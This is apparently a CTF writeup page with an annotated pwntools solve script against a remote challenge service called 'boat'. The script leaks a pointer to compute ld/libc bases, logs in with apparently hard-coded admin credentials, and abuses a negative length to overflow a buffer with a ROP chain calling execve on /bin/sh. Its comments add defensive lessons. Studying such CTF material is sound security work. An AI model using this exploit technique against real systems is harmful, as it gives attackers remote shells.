Rating: 4.0

> https://uz56764.tistory.com/109

```python
# CTF solve script (pwntools) for a service driven by text commands.
# Stages visible below: (1) leak a pointer through the "name boat" command,
# (2) log in to an admin shell, (3) send an oversized binary message that
# overwrites control data with a return chain built from ld.so addresses.
# The target binary is not part of this page, so the root-cause notes below
# are inferences to confirm against the challenge source.
from pwn import *

#context.log_level = 'debug'
# NOTE(review): this local process is still spawned even though `p` is
# rebound to the remote connection a few lines down; keep only one of the two.
p = process(["boat.exe","1","4001"])
#p = process(["./start_boats.sh"])
#p = process(["./boat.exe"], env={'LD_PRELOAD':'./libc.so.6'})

p = remote("be.ax", 30190)

# Stage 1: information leak. A 7-byte name is sent, and the reply is read up
# to the first 0x7f byte; the last 6 bytes are treated as a little-endian
# user-space pointer. Presumably the name buffer is echoed without a
# terminator so adjacent memory is printed -- confirm against the binary.
# Defensive takeaway: always terminate/length-bound strings before echoing.
p.sendline(b'name boat')
p.sendline(b'a'*7)

lic = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
# Fixed offsets from the leaked pointer to the two module bases; they are
# specific to the loader/libc build used by the challenge.
ld_base = lic - 0x3b2e0
print(f'ld_base : {hex(ld_base)}')
# libc_base is only printed; the payload below uses ld_base exclusively.
libc_base = lic - 0x7f32e0
print(f'libc_base : {hex(libc_base)}')
# Pause until Enter is pressed (e.g. to attach a debugger to the local run).
# NOTE(review): raw_input is the Python 2 name; under Python 3 this relies on
# pwntools making it available -- confirm.
raw_input()

# Stage 2: switch to the admin shell using what look like a fixed username
# and password. Presumably these are hard-coded in the binary -- a finding
# in its own right (embedded credentials) -- confirm.
p.sendline(b'.cshelladmin')
p.sendline(b'admin')
p.sendline(b'09sr')

# Stage 3: memory corruption via the binary-message command. The length is
# given as -80 while far more than 80 bytes follow. Presumably a signed
# length passes an upper-bound check and is later used as unsigned -- confirm.
# Defensive takeaway: parse lengths as unsigned and reject values outside
# [0, buffer size] before copying. 4001 matches the second argument passed
# to boat.exe above (likely the destination id/port).
p.sendline(b'send_bin_msg')
p.sendline(b'-80')
p.sendline(b'4001')
# Payload layout: "/bin/sh\0" string, 0x80 filler bytes, then a chain of
# ld.so-relative addresses interleaved with constants. 0x3b is the x86-64
# Linux execve syscall number, so the chain presumably sets up and issues
# execve on the string -- the gadget contents are not shown on this page.
p.sendline(b'/bin/sh\x00'+b'a'*0x80+p64(ld_base+0x00000000000054da)+p64(0x0)+p64(ld_base+0x0000000000020342)+p64(0x3b)+p64(0x0)+p64(0x0)+p64(ld_base+0x000000000000cbc6))

# Hand the connection over to the terminal.
p.interactive()
```

Original writeup (https://uz56764.tistory.com/109).